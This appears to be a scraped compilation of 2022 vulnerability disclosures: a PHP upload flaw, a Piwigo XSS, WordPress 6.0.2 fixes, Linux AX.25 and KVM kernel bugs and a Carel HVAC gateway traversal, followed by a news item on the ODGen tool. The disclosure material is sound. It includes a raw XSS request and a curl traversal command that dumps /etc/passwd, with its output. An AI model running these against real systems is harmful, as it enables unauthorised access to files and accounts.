An arbitrary file upload vulnerability in the component /admin/products/controller.php?action=add of Online Ordering System v2.3.2 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**1** contributor

**Users who have contributed to this file**

CVE-2022-36580: Zerrr0_Vulnerability/Arbitrary-File-Upload-Vulnerability.md at main · zerrr0/Zerrr0_Vulnerability

The application manage_website.php on Garage Management System 1.0 is vulnerable to Shell File Upload. The already authenticated malicious user, can upload a dangerous RCE or LCE exploit file.

**Description:**

The application manage\_website.php on Garage-Management-System-1.0 is vulnerable to Shell File Upload. The already authenticated malicious user can upload a very dangerous RCE or LCE exploit file.  
After this attack, he can share a lot of sensitive information or he can do more very bad things with this system. No matter what host it is, internal or external.

Status: Highly Vulnerable

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-37184: CVE-nu11secur1ty/vendors/mayuri_k/2022/Garage-Management-System-1.0-SFU at main · nu11secur1ty/CVE-nu11secur1ty

Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created\-monthly\-list%22%3Ehttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned\_host.com
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: en\-US,en;q\=0.5
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg\_id\=hctfqtab45adhogo2suhq2mr0c; ssc\_phoneSwap\=0
Upgrade\-Insecure\-Requests: 1

CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty

The WordPress Core version 6.0.2 release addresses cross site scripting and remote SQL injection vulnerabilities.

    Description: SQL Injection via Links LIMIT clauseAffected Versions: WordPress Core < 6.0.2Researcher: FVDCVE ID: PendingCVSS Score: 8.0 (High)CVSS Vector:CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:HFully Patched Version: 6.0.2The WordPress Link functionality, previously known as “Bookmarks”, is no longer enabled by default on new WordPress installations. Older sites may still have the functionality enabled, which means that millions of legacy sites are potentially vulnerable, even if they are running newer versions of WordPress. Fortunately, we found that the vulnerability requires administrative privileges and is difficult to exploit in a default configuration. It is possible that 3rd party plugins or themes might allow this vulnerability to be used by editor-level users or below, and in these cases the Wordfence firewall will block any such exploit attempts.Vulnerable versions of WordPress failed to successfully sanitize the limit argument of the link retrieval query in the get_bookmarks function, used to ensure that only a certain number of links were returned. In a default configuration, only the Links legacy widget calls the get_bookmarks function in a way that allows this argument to be set by a user. Legacy widgets involve additional safeguards, and the injection point of the query itself poses additional difficulties, making this vulnerability nontrivial to exploit.Description: Contributor+ Stored Cross-Site Scripting via use of the_meta functionAffected Versions: WordPress Core < 6.0.2Researcher: John BlackbournCVE ID: PendingCVSS Score: 4.9 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:NFully Patched Version: 6.0.2WordPress content creators, such as Contributors, Editors, Authors, and Administrators, have the ability to add custom fields to any page and post created. The purpose of this is to make it possible for site content creators to add and associate additional data to posts and pages.WordPress has several functions available to site owners to display custom fields created and associated with posts and pages. One of these functions is the the_meta function which retrieves the supplied post’s or page’s custom field data, which is stored as post meta data, through the get_post_custom_keys and get_post_custom_values functions. Once the custom fields for a post/page are retrieved, the function outputs the post meta keys and values data as a list. Unfortunately, in versions older than 6.0.2 this data was unescaped on output making it possible for any injected scripts in post meta keys and values to be executed.Due to the fact that any user with access to the post editor can add custom meta fields, users with access to the editor such as contributors could inject malicious JavaScript that executes on any page or post where this function is called.WordPress core does not call the_meta anywhere in its codebase by default. As such this vulnerability does require a plugin or theme that calls the the_meta function, or for this function to have been programmatically added to a PHP file for execution, so the vast majority of site owners are not vulnerable to this issue. The the_meta function is considered deprecated as of 6.0.2 and get_post_meta is the recommended alternative.The Wordfence Threat Intelligence Team deployed a firewall rule to help protect Wordfence Premium, Care & Response customers today. Wordfence Free users will receive the same protection in 30 days on September 29, 2022.Description: Stored Cross-Site Scripting via Plugin Deactivation and Deletion errorsAffected Versions: WordPress Core < 6.0.2Researcher: Khalilov MoeCVE ID: PendingCVSS Score: 4.7 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:NFully Patched Version: 6.0.2The final vulnerability involves the error messages displayed when a plugin has been deactivated due to an error, or when a plugin can not be deleted due to an error. As these error messages were not escaped, any JavaScript present in these error messages would execute in the browser session of an administrator visiting the plugins page. This vulnerability would require a separate malicious or vulnerable plugin or other code to be installed on the site, which would typically require an administrator to install it themselves. In almost all cases where this vulnerability might be exploitable an attacker would already have a firm foothold on the vulnerable site.Our built-in XSS rule should block any attempts to generate crafted error messages based on user input to a vulnerable plugin, and the Wordfence scanner will detect any malicious plugins uploaded by an administrator.ConclusionIn today’s article, we covered three vulnerabilities patched in the WordPress 6.0.2 Security and Maintenance Release. Most actively used WordPress sites should be patched via automatic updates within the next 24 hours, and any sites that remain vulnerable would only be exploitable under very specific circumstances.We have released a firewall rule to Wordfence Premium, Care, and Response users to protect against any exploits targeting the the_meta function and this rule should become available to Wordfence free users after 30 days, on on September 29, 2022.As always, we strongly recommend updating your site to a patched version of WordPress if it hasn’t been updated automatically. As long as you are running a version of WordPress greater than 3.7, an update is available to patch these vulnerabilities while keeping you on the same major version, so you will not need to worry about compatibility issues.Props to Khalilov Moe, John Blackbourn, & FVD for discovering and responsibly disclosing these vulnerabilities. Special thanks to Wordfence Threat Intelligence Lead Chloe Chamberland for collaborating on this post.

WordPress Core Cross Site Scripting / SQL Injection

A NULL pointer dereference flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 16:14:37 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1205 kernel: Null pointer dereference and use-after-free
 in net/ax25/ax25\_timer.c

Hello there,

There are NPD and use-after-free vulnerabilities in net/ax25/ax25\_timer.c
of linux that allow attacker to crash linux kernel by simulating ax25 device
from user space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

There are race conditions that may lead to null pointer dereferences in
ax25\_heartbeat\_expiry(), ax25\_t1timer\_expiry(), ax25\_t2timer\_expiry(),
ax25\_t3timer\_expiry() and ax25\_idletimer\_expiry(), when we use
ax25\_kill\_by\_device() to detach the ax25 device.

One of the race conditions that cause null pointer dereferences can be
shown as below:

      (Thread 1)                    |      (Thread 2)
ax25\_connect()                      |
 ax25\_std\_establish\_data\_link()     |
  ax25\_start\_t1timer()              |
   mod\_timer(&ax25->t1timer,..)     |
                                    | ax25\_kill\_by\_device()
   (wait a time)                    |  ...
                                    |  s->ax25\_dev = NULL; //(1)
   ax25\_t1timer\_expiry()            |
    ax25->ax25\_dev->values\[..\] //(2)|  ...
     ...                            |

We set null to ax25\_cb->ax25\_dev in position (1) and dereference
the null pointer in position (2).

There are also race conditions that may lead to UAF bugs in
ax25\_heartbeat\_expiry(), ax25\_t1timer\_expiry(), ax25\_t2timer\_expiry(),
ax25\_t3timer\_expiry() and ax25\_idletimer\_expiry(), when we call
ax25\_release() to deallocate ax25\_dev.

      (Thread 1)                    |      (Thread 2)
ax25\_dev\_device\_up() //(1)          |
...                                 | ax25\_kill\_by\_device()
ax25\_bind()          //(2)          |
ax25\_connect()                      | ...
 ax25\_std\_establish\_data\_link()     |
  ax25\_start\_t1timer()              | ax25\_dev\_device\_down() //(3)
   mod\_timer(&ax25->t1timer,..)     |
                                    | ax25\_release()
   (wait a time)                    |  ...
                                    |  ax25\_dev\_put(ax25\_dev) //(4)FREE
   ax25\_t1timer\_expiry()            |
    ax25->ax25\_dev->values\[..\] //USE|  ...
     ...                            |

We increase the refcount of ax25\_dev in position (1) and (2), and
decrease the refcount of ax25\_dev in position (3) and (4).
The ax25\_dev will be freed in position (4) and be used in
ax25\_t1timer\_expiry().

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the NPD and UAF vulnerabilities to crash the linux kernel.

BUG: kernel NULL pointer dereference, address: 0000000000000050
CPU: 1 PID: 0 Comm: swapper/1 Not tainted 5.17.0-rc6-00794-g45690b7d0
RIP: 0010:ax25\_t1timer\_expiry+0x12/0x40
...
Call Trace:
 call\_timer\_fn+0x21/0x120
 \_\_run\_timers.part.0+0x1ca/0x250
 run\_timer\_softirq+0x2c/0x60
 \_\_do\_softirq+0xef/0x2f3
 irq\_exit\_rcu+0xb6/0x100
 sysvec\_apic\_timer\_interrupt+0xa2/0xd0
...

==============================================================

\[  106.116942\] BUG: KASAN: use-after-free in ax25\_t1timer\_expiry+0x1c/0x60
\[  106.116942\] Read of size 8 at addr ffff88800bda9028 by task swapper/0/0
\[  106.116942\] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.17.0-06123-g0905eec574
\[  106.116942\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-14
\[  106.116942\] Call Trace:
...
\[  106.116942\]  ax25\_t1timer\_expiry+0x1c/0x60
\[  106.116942\]  call\_timer\_fn+0x122/0x3d0
\[  106.116942\]  \_\_run\_timers.part.0+0x3f6/0x520
\[  106.116942\]  run\_timer\_softirq+0x4f/0xb0
\[  106.116942\]  \_\_do\_softirq+0x1c2/0x651
...

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/fc6d01ff9ef03b66d4a3a23b46fc3c3d8cf92009
https://github.com/torvalds/linux/commit/82e31755e55fbcea6a9dfaae5fe4860ade17cbc0

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-03-21: commit fc6d01ff9ef0 accepted to mainline kernel
2022-03-29: commit 82e31755e55f accepted to mainline kernel
2022-04-01: CVE-2022-1205 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1205: security - CVE-2022-1205 kernel: Null pointer dereference and use-after-free in net/ax25/ax25_timer.c

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2022-2590: security - CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions

Carel pCOWeb HVAC BACnet Gateway 2.1.0, Firmware: A2.1.0 - B2.1.0, Application Software: 2.15.4A Software v16 13020200 suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal Vendor: CAREL INDUSTRIES S.p.A. Product web page: https://www.carel.com Affected version: Firmware: A2.1.0 - B2.1.0 Application Software: 2.15.4A Software version: v16 13020200 Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems. Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. ======================================================================================= /usr/local/www/usr-cgi/logdownload.cgi: --------------------------------------- 01: #!/bin/bash 02: 03: if \[ "$REQUEST\_METHOD" = "POST" \]; then 04: read QUERY\_STRING 05: REQUEST\_METHOD=GET 06: export REQUEST\_METHOD 07: export QUERY\_STRING 08: fi 09: 10: LOGDIR="/usr/local/root/flash/http/log" 11: 12: tmp=${QUERY\_STRING%"$"\*} 13: cmd=${tmp%"="\*} 14: if \[ "$cmd" = "dir" \]; then 15: PATHCURRENT=$LOGDIR/${tmp#\*"="} 16: else 17: PATHCURRENT=$LOGDIR 18: fi 19: 20: tmp=${QUERY\_STRING#\*"$"} 21: cmd=${tmp%"="\*} 22: if \[ "$cmd" = "file" \]; then 23: FILECURRENT=${tmp#\*"="} 24: else 25: if \[ -f $PATHCURRENT/lastlog.csv.gz \]; then 26: FILECURRENT=lastlog.csv.gz 27: else 28: FILECURRENT=lastlog.csv 29: fi 30: fi 31: 32: if \[ ! -f $PATHCURRENT/$FILECURRENT \]; then 33: echo -ne "Content-type: text/html\\r\\nCache-Control: no-cache\\r\\nExpires: -1\\r\\n\\r\\n" 34: cat carel.inc.html 35: echo "

File not available!

" 36: cat carel.bottom.html 37: exit 38: fi 39: 40: if \[ -z $(echo $FILECURRENT | grep -i gz ) \]; then 41: if \[ -z $(echo $FILECURRENT | grep -i bmp ) \]; then 42: if \[ -z $(echo $FILECURRENT | grep -i svg ) \]; then 43: echo -ne "Content-Type: text/csv\\r\\n" 44: else 45: echo -ne "Content-Type: image/svg+xml\\r\\n" 46: fi 47: else 48: echo -ne "Content-Type: image/bmp\\r\\n" 49: fi 50: else 51: echo -ne "Content-Type: application/x-gzip\\r\\n" 52: fi 53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\\r\\n\\r\\n" 54: 55: cat $PATHCURRENT/$FILECURRENT ======================================================================================= Tested on: GNU/Linux 4.11.12 (armv7l) thttpd/2.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5709 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php 10.05.2022 -- $ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:65534:65534:nobody:/home:/bin/false guest:x:502:101::/home/guest:/bin/bash carel:x:500:500:Carel:/home/carel:/bin/bash http:x:48:48:HTTP users:/usr/local/www/http:/bin/false httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash sshd:x:1000:1001:SSH drop priv user:/:/bin/false

CVE-2022-37122

A NULL pointer dereference issue was found in KVM when releasing a vCPU with dirty ring support enabled. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 7 Apr 2022 10:15:42 +0800 (GMT+08:00)
From: kangel <kangel@....edu.cn>
To: oss-security@...ts.openwall.com
Cc: pgn@....edu.cn, qiuhao@...ec.org
Subject: Linux kernel: x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push




-----原始邮件-----
发件人:kangel <kangel@....edu.cn>
发送时间:2022-04-06 21:11:39 (星期三)
收件人: security@...nel.org, linux-distros@...openwall.org
抄送: secalert@...hat.com, pbonzini@...hat.com, pgn@....edu.cn, qiuhao@...ec.org
主题: \[vs\] x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push


Hi developers,
    We found a null-ptr-deref in the kvm module which can lead to DoS. This flaw is in kvm\_dirty\_ring\_push in virt/kvm/dirty\_ring.c. The linux kernel version is 5.17.0-rc8. We would appreciate a CVE ID if this is a security issue.
------------\[ Description \]------------
    When we call kvm\_vcpu\_release(), it will call kvm\_dirty\_ring\_free() which will free ring->dirty\_gfns and set it to NULL. Then if we can set kvm->dirty\_ring\_size != NULL\[1\] and make vcpu->arch.st.preempt to NULL\[2\], it will call kvm\_dirty\_ring\_push() and lead to null-ptr-deref in virt/kvm/dirty\_ring.c:159.
    The condition of \[1\] can be set by do ioctl$KVM\_CAP\_DIRTY\_LOG\_RING and the condition of \[2\] can be set by race of doing ioctf$KVM\_RUN.
------------\[ Reproducer \]------------
qemu run:
qemu-system-x86\_64 -m 512M -smp 2 -kernel /home/zju/linux-5.17-rc8/arch/x86/boot/bzImage -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 nokaslr" -drive file=/home/zju/script/stretch2.img,format=raw -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 -net nic,model=e1000 -enable-kvm -nographic 
poc.c is attached( run in qemu).
gcc poc.c -static -o poc -lpthread

------------\[ Credits \]------------
Yongkang Jia (Zhejiang University)
Gaoning Pan (Zhejiang University)
Qiuhao Li (Harbin Institute of Technology)
------------\[ Backtrace \]------------
KASAN: null-ptr-deref in range \[0x0000000000000030-0x0000000000000037\]
CPU: 0 PID: 453 Comm: syz-executor425 Not tainted 5.17.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1~cloud0 04/01/2014
RIP: 0010:kvm\_dirty\_ring\_push+0x10c/0x2e0 arch/x86/kvm/../../../virt/kvm/dirty\_ring.c:159
Code: 0f 8e 8e 01 00 00 48 b8 00 00 00 00 00 fc ff df 41 83 ec 01 44 23 65 00 49 c1 e4 04 4c 01 e3 48 8d 7b 04 48 89 fa 48 c1 ea 03 <0f> b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 47
RSP: 0018:ffff88800812fb88 EFLAGS: 00010207
RAX: dffffc0000000000 RBX: 0000000000000030 RCX: ffffffffa5a929d4
RDX: 0000000000000006 RSI: 0000000000000000 RDI: 0000000000000034
RBP: ffff888004d12118 R08: 0000000000000001 R09: fffffbfff5104469
R10: 0000000000000000 R11: fffffbfff5104468 R12: 0000000000000030
R13: 0000000000000000 R14: 0000000000000000 R15: ffff888004d10dd0
FS:  0000000000868880(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020ffe010 CR3: 0000000005ba4002 CR4: 00000000003726f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
 <TASK>
 mark\_page\_dirty\_in\_slot+0x192/0x270 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3171
 kvm\_steal\_time\_set\_preempted arch/x86/kvm/x86.c:4600 \[inline\]
 kvm\_arch\_vcpu\_put+0x34e/0x5b0 arch/x86/kvm/x86.c:4618
 vcpu\_put+0x1b/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:211
 vmx\_free\_vcpu+0xcb/0x130 arch/x86/kvm/vmx/vmx.c:6985
 kvm\_arch\_vcpu\_destroy+0x76/0x290 arch/x86/kvm/x86.c:11219
 kvm\_vcpu\_destroy arch/x86/kvm/../../../virt/kvm/kvm\_main.c:441 \[inline\]
 kvm\_destroy\_vcpus+0x119/0x280 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:460
 kvm\_free\_vcpus arch/x86/kvm/x86.c:11659 \[inline\]
 kvm\_arch\_destroy\_vm+0x22a/0x380 arch/x86/kvm/x86.c:11769
 kvm\_destroy\_vm arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1217 \[inline\]
 kvm\_put\_kvm+0x3ff/0x900 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1250
 kvm\_vcpu\_release+0x4d/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3668
 \_\_fput+0x21b/0x940 fs/file\_table.c:317
 task\_work\_run+0xde/0x180 kernel/task\_work.c:164
 tracehook\_notify\_resume include/linux/tracehook.h:188 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:175 \[inline\]
 exit\_to\_user\_mode\_prepare+0x14d/0x150 kernel/entry/common.c:207
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:289 \[inline\]
 syscall\_exit\_to\_user\_mode+0x1d/0x40 kernel/entry/common.c:300
 do\_syscall\_64+0x48/0x90 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
------------\[ Patch \]------------
We try to do a patch, which can not make the poc trigger this flaw.
diff --git a/virt/kvm/dirty\_ring.c b/virt/kvm/dirty\_ring.c.patch
index 222ecc8..38f1b66 100644
--- a/virt/kvm/dirty\_ring.c
+++ b/virt/kvm/dirty\_ring.c.patch
@@ -154,6 +154,8 @@ void kvm\_dirty\_ring\_push(struct kvm\_dirty\_ring \*ring, u32 slot, u64 offset)
        /\* It should never get full \*/
        WARN\_ON\_ONCE(kvm\_dirty\_ring\_full(ring));

+       if (!ring->dirty\_gfns)
+               return;
        entry = &ring->dirty\_gfns\[ring->dirty\_index & (ring->size - 1)\];

        entry->slot = slot;


------------\[ Cut here \]------------
C repro and kernel config are attached.
Best regards.
    Yongkang Jia of Zhejiang University

**Content of type "**text/html**" skipped**

**View attachment "**poc.c**" of type "**text/plain**" (6534 bytes)**

**Download attachment "**config**" of type "**application/octet-stream**" (130642 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1263: security - Linux kernel: x86/kvm: null-ptr-deref in kvm_dirty_ring_push

New graph-based tool offers a better alternative to current approaches for finding vulnerabilities in JavaScript code, they note.

Researchers at Johns Hopkins University recently uncovered a startling 180 zero-day vulnerabilities across thousands of Node.js libraries using a new code analysis tool they developed specifically for the purpose, called ODGen.

Seventy of those flaws have since received common vulnerabilities and exposures (CVE) identifiers. They include command injection flaws, path traversal vulnerabilities, arbitrary code execution issues, and cross-site scripting vulnerabilities — some of them in widely used applications.

In a paper released at the Usenix Security Symposium earlier this month, the Johns Hopkins researchers — Song Li, Mingqing Kang, Jianwei Hou, and Yinzhi Cao — described ODGen as a better alternative to current code-analysis and so-called graph query-based approaches for finding Node.js vulnerabilities.

Program analysis-based approaches have proved useful in helping detect individual vulnerability types such as code-injection flaws in JavaScript. But they cannot be easily extended to detect all kind of vulnerabilities that might be present in the Node.js platform, the researchers said. Similarly, graph-based code-analysis methods — where code is first represented as a graph and then queried for specific coding errors — works well in environments such as C++ and PHP. However, graph-based approaches are not as efficient in mining for JavaScript vulnerabilities because of the programming language's extensive use of dynamic features, they noted.

**A 'Novel' Approach for Finding JavaScript Vulnerabilities**

So, the researchers instead developed what they described as a "novel" and better method called Object Dependence Graph (ODG) that can be used for detecting Node.js vulnerabilities. They implemented ODGen to generate "ODG" for Node.js programs to detect vulnerabilities, they said.

Cao, assistant professor of computer science at Johns Hopkins University and a co-author of the research report, uses a couple of analogies to describe graph-based code analysis in general and their proposed Objective Dependence Graph. "If we consider a vulnerability as a special pattern — say, a green node connected with a red node and then a black node — a graph-based code-analysis tool first converts programs to a graph with many nodes and edges," Cao says. "Then the tool looks for such patterns in the graph to locate a vulnerability."

